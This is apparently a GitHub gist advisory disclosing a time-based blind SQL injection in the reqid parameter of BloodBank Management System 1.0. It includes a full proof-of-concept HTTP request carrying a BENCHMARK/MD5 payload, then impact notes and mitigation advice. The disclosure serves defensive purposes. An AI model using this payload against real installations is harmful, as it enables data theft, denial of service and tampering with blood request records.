Skip to content

Instantly share code, notes, and snippets.

@higordiego
Created October 25, 2024 19:51
Show Gist options
  • Save higordiego/18cf04067697c8ceb2cba68980139dcc to your computer and use it in GitHub Desktop.
Save higordiego/18cf04067697c8ceb2cba68980139dcc to your computer and use it in GitHub Desktop.

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection (Time-Based Blind)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • /file/cancel.php?reqid=2

Vulnerability Description:

A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0, specifically in the cancel request functionality. This flaw arises from a lack of proper input sanitization on the reqid parameter, enabling malicious users to inject SQL commands into the query handling cancellation requests.

The vulnerability allows for a time-based blind SQL injection attack. In this scenario, an attacker injects code that makes the system execute time-intensive SQL operations, such as using the BENCHMARK function, to delay the response. If the request is valid, the system delays by a predefined amount of time, confirming that the injection worked. This technique can lead to:

  • Exfiltration of sensitive data over time.
  • Denial of Service (DoS) by slowing down the system.
  • Tampering with blood request statuses, including unauthorized cancellations.

Proof of Concept (PoC):

Below is an example of a GET request demonstrating the time-based blind SQL injection vulnerability:

GET /file/cancel.php?reqid=2'%20AND%202655%3dBENCHMARK(5000000%2cMD5(0x74466957))--%20pFWQ HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A-.%20Our%20team%20will%20contact%20you%20soon.
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

Explanation:

In this PoC, the query includes a BENCHMARK function that forces the system to perform 5,000,000 MD5 operations, resulting in a delayed response if the SQL query executes successfully. The response time confirms the injection vulnerability and demonstrates that the backend is susceptible to such attacks.


Image

  • Image One
  • Image Two

Impact:

  • Data Breach: Attackers could extract data from the database over time.
  • Denial of Service (DoS): Multiple malicious requests could overload the server, reducing system availability.
  • Unauthorized Cancellations: Attackers could cancel blood requests without proper authorization, disrupting critical processes.
  • System Integrity Issues: Alterations in request records could cause confusion or operational failures in blood request management.

Mitigation Recommendations:

  1. Use Parameterized Queries: Replace dynamic queries with prepared statements to prevent SQL injection.
  2. Input Validation: Ensure that all input parameters, including reqid, are properly validated and sanitized.
  3. Database Privileges: Limit the database user's permissions to minimize potential damage from an exploit.
  4. Error Handling: Avoid exposing detailed error messages that might aid attackers in crafting injections.
  5. Rate Limiting and Monitoring: Monitor requests and apply rate limits to prevent denial-of-service attacks.
  6. Security Testing: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities early.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment